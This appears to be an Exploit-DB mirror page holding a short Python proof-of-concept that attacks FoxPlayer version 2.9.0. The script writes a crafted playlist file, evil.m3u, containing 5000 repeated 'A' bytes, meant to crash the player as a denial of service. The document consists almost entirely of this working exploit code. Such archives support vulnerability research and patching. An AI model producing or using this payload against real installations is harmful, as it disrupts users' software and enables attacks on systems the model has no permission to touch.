exploit-db-mirror/exploits/windows/dos/23923.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
363 B
Python
Executable file

#!/usr/bin/python
# Exploit Title:Denial of Service in FoxPlayer version 2.9.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: metacom
# version: version 2.9.0
# Category: poc
# Tested on: windows 7 German
filename="evil.m3u"
buffer = "\x41" * 5000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()